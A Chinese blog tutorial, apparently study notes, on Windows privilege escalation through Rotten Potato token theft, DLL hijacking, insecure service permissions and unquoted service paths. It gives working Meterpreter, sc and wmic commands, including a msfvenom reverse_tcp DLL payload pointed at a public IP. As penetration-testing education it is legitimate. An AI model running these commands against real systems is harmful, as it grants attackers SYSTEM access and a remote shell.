权限提升-烂土豆&dll劫持&引号路径&服务权限

RottenPotato(烂土豆)提权的原理简述如下:

  1. 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端
  2. 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
  3. 模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。

所以,一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。测试过程中,我发现使用已经建好的账户(就是上面说的用户和账户)去反弹meterpreter然后再执行EXP的时候会失败,但使用菜刀(IIS服务器权限)反弹meterpreter就会成功。


烂土豆比热土豆的优点是:

  1. 100%可靠
  2. (当时)全版本通杀
  3. 立即生效,不用像hot potato那样有时候需要等Windows更新才能使用

总之,我对这个的理解是通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改为自己的区块获取SYSTEM权限,然后利用msf的模仿令牌功能模仿SYSTEM令牌。


必备知识点:
#令牌窃取配合烂土豆提权 单纯令牌窃取:Web 权限或本地提权 如配合烂土豆提权:Web 或数据库等权限 #不带引号服务路径安全问题 服务路径提权:Web 权限或本地提权
#不安全的服务权限配置问题 服务权限配置:Web 权限或本地提权(Web 几率小)
#补充说明:dll 劫持提权及 AlwaysInstallElevated 等说明 dll 劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋 AlwaysInstallElevated 提权默认禁用配置,利用成功机会很少


#案例1.Win2012-烂土豆配合令牌窃取提权-Web权限
原理:参考上述内容,非服务类用户无法窃取成功
过程:上传烂土豆-执行烂土豆-利用窃取模块-窃取SYSTEM-成功
实现:web权限-通过烂土豆配合令牌-获取SYSTEM

《MSF操作》
upload /root/potato.exe C:\Users\Public
cd C:\\Users\\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

#案例2.Wind2012-DLL劫持提权应用配合MSF-web权限
原理:Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的 位置放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下 面的顺序进行搜索:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)

过程:信息收集(第三方软件)-进程调试(本地调试)-制作 dll 并上传-替换 dll-启动应用后成功
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll

image.png

#案例3.Win2012-不安全的服务权限配合MSF-本地权限

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有 过多的权限,例如,可以直接修改它导致重定向执行文件。 过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

accesschk.exe -uwcqv "administrators" *	#微软官方工具
accesschk.exe -uwcqv "users" *
sc config "NewServiceName" binpath="C:\Program.exe"
sc start "NewServiceName"


#案例4.Win2012-不带引号服务路径配合MSF-Web,本地权限
原理:当 Windows 服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完 整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系 统将会执行找到的空格分隔的服务路径的第一个实例。
过程:检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """

image.png
/i /v “”"

[外链图片转存中...(img-9Eha8Un1-1634110127895)]
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨雾_雨屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值